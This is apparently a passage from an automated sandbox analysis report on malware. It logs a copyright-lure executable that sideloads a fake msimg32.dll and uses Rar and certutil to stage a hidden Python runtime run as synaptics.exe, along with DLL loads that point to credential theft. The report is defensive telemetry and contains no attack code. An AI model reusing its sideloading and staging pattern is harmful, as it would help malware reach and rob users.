            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2128 --field-trial-handle=1616,i,10171936117906713763,8070250402194629303,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
            Source: C:\Program Files\7-Zip\7zG.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Program Files\7-Zip\7zG.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Program Files\7-Zip\7zG.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files\7-Zip\7zG.exeSection loaded: explorerframe.dllJump to behavior
            Source: C:\Program Files\7-Zip\7zG.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Program Files\7-Zip\7zG.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Program Files\7-Zip\7zG.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Program Files\7-Zip\7zG.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Program Files\7-Zip\7zG.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Program Files\7-Zip\7zG.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Program Files\7-Zip\7zG.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Program Files\7-Zip\7zG.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal..exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal..exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal..exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal..exeSection loaded: msimg32.dllJump to behavior
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal..exeSection loaded: oledlg.dllJump to behavior
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal..exeSection loaded: vcruntime140.dllJump to behavior
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal..exeSection loaded: msimg32.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: policymanager.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: msvcp110_win.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: pcacli.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\certutil.exeSection loaded: certcli.dll
            Source: C:\Windows\SysWOW64\certutil.exeSection loaded: cabinet.dll
            Source: C:\Windows\SysWOW64\certutil.exeSection loaded: cryptui.dll
            Source: C:\Windows\SysWOW64\certutil.exeSection loaded: certca.dll
            Source: C:\Windows\SysWOW64\certutil.exeSection loaded: ncrypt.dll
            Source: C:\Windows\SysWOW64\certutil.exeSection loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\certutil.exeSection loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\certutil.exeSection loaded: ntdsapi.dll
            Source: C:\Windows\SysWOW64\certutil.exeSection loaded: version.dll
            Source: C:\Windows\SysWOW64\certutil.exeSection loaded: secur32.dll
            Source: C:\Windows\SysWOW64\certutil.exeSection loaded: samcli.dll
            Source: C:\Windows\SysWOW64\certutil.exeSection loaded: dsrole.dll
            Source: C:\Windows\SysWOW64\certutil.exeSection loaded: logoncli.dll
            Source: C:\Windows\SysWOW64\certutil.exeSection loaded: netutils.dll
            Source: C:\Windows\SysWOW64\certutil.exeSection loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\certutil.exeSection loaded: ntasn1.dll
            Source: C:\Windows\SysWOW64\certutil.exeSection loaded: uxtheme.dll
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeSection loaded: python310.dll
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeSection loaded: vcruntime140.dll
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeSection loaded: version.dll
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeSection loaded: cryptsp.dll
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeSection loaded: rsaenh.dll
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeSection loaded: cryptbase.dll
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeSection loaded: python3.dll
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeSection loaded: libcrypto-1_1.dll
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeSection loaded: iphlpapi.dll
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeSection loaded: libssl-1_1.dll
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeSection loaded: msasn1.dll
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeSection loaded: mswsock.dll
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeSection loaded: dnsapi.dll
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeSection loaded: rasadhlp.dll
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeSection loaded: fwpuclnt.dll
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeSection loaded: sqlite3.dll
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeSection loaded: libffi-7.dll
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeSection loaded: pywintypes310.dll
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeSection loaded: rstrtmgr.dll
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeSection loaded: ncrypt.dll
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeSection loaded: ntasn1.dll
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeSection loaded: dpapi.dll
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeSection loaded: uxtheme.dll
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeSection loaded: sspicli.dll
            Source: C:\Program Files\7-Zip\7zG.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{56FDF344-FD6D-11d0-958A-006097C9A090}\InProcServer32Jump to behavior
            Source: Google Drive.lnk.1.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
            Source: YouTube.lnk.1.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
            Source: Sheets.lnk.1.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
            Source: Gmail.lnk.1.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
            Source: Slides.lnk.1.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
            Source: Docs.lnk.1.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exeFile opened: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\pythonwin\pywin\default.cfgJump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: Binary string: /app/crashsubmit?appname=SumatraPDFhttp://www.haihaisoft.comlibmupdf.pdbSumatraPDF.pdbSumatraPDF-prereleaseSumatraPDF.pdbSumatraPDF-1.5.3.0.pdbSumatraPDF.pdblibmupdf.pdbSumatraPDF-no-MuPDF.pdbhttp://kjkpub.s3.amazonaws.com/sumatrapdf/prerel/SumatraPDF-prerelease-SVN_PRE_RELEASE_VER.pdb.zipsymbols_tmp.ziphttp://kjkpub.s3.amazonaws.com/sumatrapdf/rel/SumatraPDF-1.5.3.0.pdb.zipsymbols_tmp.zipSUMATRAPDF_FULLDUMPHaihaisoft PDF Reader crashedSorry, that shouldn't have happened! source: A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal..exe, 00000011.00000000.1732556609.00000000006C9000.00000002.00000001.01000000.00000008.sdmp
            Source: Binary string: nw.pdbh source: Rar.exe, 00000016.00000003.1874440484.00000246BFB5C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\win32\pythonw.pdb source: Rar.exe, 00000016.00000003.1867329681.00000246C1AAC000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000000.1883786655.0000000000C12000.00000002.00000001.01000000.0000000D.sdmp, synaptics.exe, 00000023.00000002.2455236872.0000000000C12000.00000002.00000001.01000000.0000000D.sdmp
            Source: Binary string: D:\a\1\b\bin\win32\_lzma.pdbOO source: synaptics.exe, 00000023.00000002.2561874177.000000006C0BB000.00000002.00000001.01000000.00000017.sdmp
            Source: Binary string: D:\a\1\b\bin\win32\_ssl.pdb source: synaptics.exe, 00000023.00000002.2565523236.000000006C18C000.00000002.00000001.01000000.00000014.sdmp
            Source: Binary string: C:\src\pywin32\build\temp.win32-cpython-310\Release\win32crypt.pdb## source: synaptics.exe, 00000023.00000002.2542827338.000000006BC90000.00000002.00000001.01000000.00000034.sdmp
            Source: Binary string: C:\src\pywin32\build\temp.win32-cpython-310\Release\pywintypes.pdb source: synaptics.exe, 00000023.00000002.2542082815.000000006BC6E000.00000002.00000001.01000000.00000035.sdmp
            Source: Binary string: D:\a\1\b\bin\win32\_lzma.pdb source: synaptics.exe, 00000023.00000002.2561874177.000000006C0BB000.00000002.00000001.01000000.00000017.sdmp
            Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal..exe, 00000011.00000002.1734634100.0000000073D91000.00000020.00000001.01000000.0000000A.sdmp
            Source: Binary string: m:\sumatrapdf\hpreader-windows-standard\hpreader\Release\hpreader.pdb source: A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal..exe, 00000011.00000000.1732556609.00000000006C9000.00000002.00000001.01000000.00000008.sdmp
            Source: Binary string: D:\a\1\b\bin\win32\python310.pdb source: Rar.exe, 00000016.00000003.1867329681.00000246C1E4C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb! source: Rar.exe, 00000016.00000000.1735961254.00007FF62D1B3000.00000002.00000001.01000000.0000000B.sdmp
            Source: Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: Rar.exe, 00000016.00000000.1735961254.00007FF62D1B3000.00000002.00000001.01000000.0000000B.sdmp
            Source: Binary string: D:\a\1\b\bin\win32\sqlite3.pdb source: synaptics.exe, 00000023.00000002.2555381921.000000006BF41000.00000002.00000001.01000000.0000001A.sdmp
            Source: Binary string: libmupdf.pdb source: A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal..exe, 00000011.00000000.1732556609.00000000006C9000.00000002.00000001.01000000.00000008.sdmp
            Source: Binary string: D:\a\1\b\bin\win32\_sqlite3.pdb source: synaptics.exe, 00000023.00000002.2556345443.000000006BF79000.00000002.00000001.01000000.00000019.sdmp
            Source: Binary string: D:\a\1\b\libssl-1_1.pdb source: synaptics.exe, 00000023.00000002.2564436980.000000006C152000.00000002.00000001.01000000.00000015.sdmp
            Source: Binary string: SumatraPDF-no-MuPDF.pdb source: A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal..exe, 00000011.00000000.1732556609.00000000006C9000.00000002.00000001.01000000.00000008.sdmp
            Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC source: synaptics.exe, 00000023.00000002.2572691476.000000006C334000.00000002.00000001.01000000.00000011.sdmp
            Source: Binary string: D:\a\1\b\bin\win32\_bz2.pdb source: synaptics.exe, 00000023.00000002.2562565513.000000006C0DC000.00000002.00000001.01000000.00000016.sdmp
            Source: Binary string: D:\a\1\b\libssl-1_1.pdbAA source: synaptics.exe, 00000023.00000002.2564436980.000000006C152000.00000002.00000001.01000000.00000015.sdmp
            Source: Binary string: SumatraPDF-1.5.3.0.pdb source: A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal..exe, 00000011.00000000.1732556609.00000000006C9000.00000002.00000001.01000000.00000008.sdmp
            Source: Binary string: D:\a\1\b\bin\win32\_ctypes.pdb source: synaptics.exe, 00000023.00000002.2550046792.000000006BE10000.00000002.00000001.01000000.0000001E.sdmp
            Source: Binary string: D:\a\1\b\bin\win32\pythonw.pdb source: Rar.exe, 00000016.00000003.1867329681.00000246C1AAC000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000000.1883786655.0000000000C12000.00000002.00000001.01000000.0000000D.sdmp, synaptics.exe, 00000023.00000002.2455236872.0000000000C12000.00000002.00000001.01000000.0000000D.sdmp
            Source: Binary string: C:\src\pywin32\build\temp.win32-cpython-310\Release\pywintypes.pdb++ source: synaptics.exe, 00000023.00000002.2542082815.000000006BC6E000.00000002.00000001.01000000.00000035.sdmp
            Source: Binary string: D:\a\1\b\bin\win32\unicodedata.pdb source: synaptics.exe, 00000023.00000002.2556799900.000000006C09C000.00000002.00000001.01000000.00000018.sdmp
            Source: Binary string: C:\src\pywin32\build\temp.win32-cpython-310\Release\win32crypt.pdb source: synaptics.exe, 00000023.00000002.2542827338.000000006BC90000.00000002.00000001.01000000.00000034.sdmp
            Source: Binary string: xOdx>a0m:\sumatrapdf\hpreader-windows-standard\hpreader\Release\hpreader.pdb source: A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal..exe, 00000011.00000000.1732556609.00000000006C9000.00000002.00000001.01000000.00000008.sdmp
            Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdbGCTL source: A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal..exe, 00000011.00000002.1734634100.0000000073D91000.00000020.00000001.01000000.0000000A.sdmp
            Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PICOpenSSL 1.1.1t 7 Feb 2023built on: Thu Feb 9 15:27:35 2023 UTCplatform: VC-WIN32OPENSSLDIR: "C:\Program Files (x86)\Common Files\SSL"ENGINESDIR: "C:\Program Files (x86)\OpenSSL\lib\engines-1_1"not available source: synaptics.exe, 00000023.00000002.2572691476.000000006C334000.00000002.00000001.01000000.00000011.sdmp
            Source: Binary string: C:\Users\LoneNone\Desktop\PDF SIDELOAD\SideLoad\Release\msimg32.pdb source: A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal..exe, 00000011.00000002.1734780923.0000000073E06000.00000002.00000001.01000000.00000009.sdmp
            Source: vcruntime140.dll.16.drStatic PE information: 0xC7A64295 [Sat Feb 22 01:53:25 2076 UTC]
            Source: Rar.exe.16.drStatic PE information: section name: _RDATA
            Source: python310.dll.22.drStatic PE information: section name: PyRuntim
            Source: libcrypto-1_1.dll.22.drStatic PE information: section name: .00cfg
            Source: libssl-1_1.dll.22.drStatic PE information: section name: .00cfg
            Source: mfc140u.dll.22.drStatic PE information: section name: .didat
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal..exeFile created: \a vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal..exe
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal..exeFile created: \a vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal..exe
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal..exeFile created: \a vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal..exeJump to behavior
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal..exeFile created: \a vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal..exeJump to behavior
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exeFile created: C:\Users\Public\QExvbmVOb25l\DLLs\_uuid.pydJump to dropped file
            Source: C:\Program Files\7-Zip\7zG.exeFile created: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\vcruntime140.dllJump to dropped file
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exeFile created: C:\Users\Public\QExvbmVOb25l\DLLs\winsound.pydJump to dropped file
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exeFile created: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\win32\mmapfile.pydJump to dropped file
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exeFile created: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\win32\_winxptheme.pydJump to dropped file
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exeFile created: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\Crypto\Hash\_RIPEMD160.pydJump to dropped file
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exeFile created: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\win32\win32gui.pydJump to dropped file
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exeFile created: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\Crypto\PublicKey\_x25519.pydJump to dropped file
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exeFile created: C:\Users\Public\QExvbmVOb25l\DLLs\_elementtree.pydJump to dropped file
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exeFile created: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\Crypto\Hash\_SHA384.pydJump to dropped file
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exeFile created: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\win32comext\shell\shell.pydJump to dropped file
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exeFile created: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\Crypto\Hash\_poly1305.pydJump to dropped file
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exeFile created: C:\Users\Public\QExvbmVOb25l\DLLs\_queue.pydJump to dropped file
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exeFile created: C:\Users\Public\QExvbmVOb25l\DLLs\libssl-1_1.dllJump to dropped file
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exeFile created: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\win32\win32ras.pydJump to dropped file
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exeFile created: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\win32\win32print.pydJump to dropped file
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exeFile created: C:\Users\Public\QExvbmVOb25l\DLLs\select.pydJump to dropped file
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exeFile created: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\win32\win32wnet.pydJump to dropped file
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exeFile created: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\Crypto\Hash\_BLAKE2s.pydJump to dropped file
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exeFile created: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\win32\win32crypt.pydJump to dropped file
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exeFile created: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\Crypto\Hash\_MD4.pydJump to dropped file
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exeFile created: C:\Users\Public\QExvbmVOb25l\DLLs\sqlite3.dllJump to dropped file
